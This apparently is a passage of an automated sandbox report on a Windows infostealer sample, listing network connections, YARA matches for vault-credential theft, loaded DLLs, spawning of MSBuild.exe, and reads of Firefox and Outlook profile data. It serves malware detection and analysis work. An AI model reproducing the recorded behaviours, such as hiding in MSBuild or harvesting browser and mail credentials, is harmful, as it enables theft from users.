                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50425
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54902
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51998
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54901
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53662 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54228
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52150 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54230
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53155 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53971 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55149 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52697 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54233
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53128 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54363
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53151
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54365 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53158
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54877 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54365
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53470 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54490
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54373
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54372
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54303 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52850 -> 443
                  Source: unknownHTTPS traffic detected: 140.82.112.4:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.54.158:443 -> 192.168.2.4:51325 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:52582 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: C:\Windows\System32\WerFault.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_02DDA5502_2_02DDA550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_02DD4AC02_2_02DD4AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_02DD3EA82_2_02DD3EA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_02DDAD082_2_02DDAD08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_02DD41F02_2_02DD41F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0667C4802_2_0667C480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0667AE5C2_2_0667AE5C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E56402_2_066E5640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E66902_2_066E6690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E24182_2_066E2418
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066EC2282_2_066EC228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066EB2D82_2_066EB2D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E7E202_2_066E7E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E77402_2_066E7740
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066EE4502_2_066EE450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E00402_2_066E0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E5D982_2_066E5D98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066E00062_2_066E0006
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7284 -s 107720
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic PE information: No import functions for PE file found
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000000.1749577878.000001CD8791A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYaheHat.exe0 vs SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeBinary or memory string: OriginalFilenameYaheHat.exe0 vs SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, ShiftRightLogicalRoundedScalarProperty.csBase64 encoded string: 'GRIKCxDG6r7sEQjyGjVD/RoxJcz5Cgq7IvT/zsrCEjEJBAo0FNfGz8/v8vDBA/jEEvwJAQ=='
                  Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/4@5/100
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d0665840-2b0e-4505-a7e7-70243dd8566cJump to behavior
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeVirustotal: Detection: 21%
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeReversingLabs: Detection: 23%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7284 -s 107720
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.PDBq source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3071384004.0000004C540F2000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: TLpC:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.PDB source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3071384004.0000004C540F2000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.PDBH source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3071384004.0000004C540F2000.00000004.00000010.00020000.00000000.sdmp
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic PE information: 0xBE572727 [Thu Mar 12 10:44:55 2071 UTC]

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 42571
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 34633
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 8090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5199
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 8881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 49042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8090 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8090 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 5555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 26305
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 2792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34633 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8881 -> 49901
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 35891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50239 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 3050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50281 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 10008
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50013
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 10051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 5401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5199
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 36073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 9401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 13286
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 8060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 10102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 60964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35891 -> 50219
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50322 -> 55555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 87
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 26592
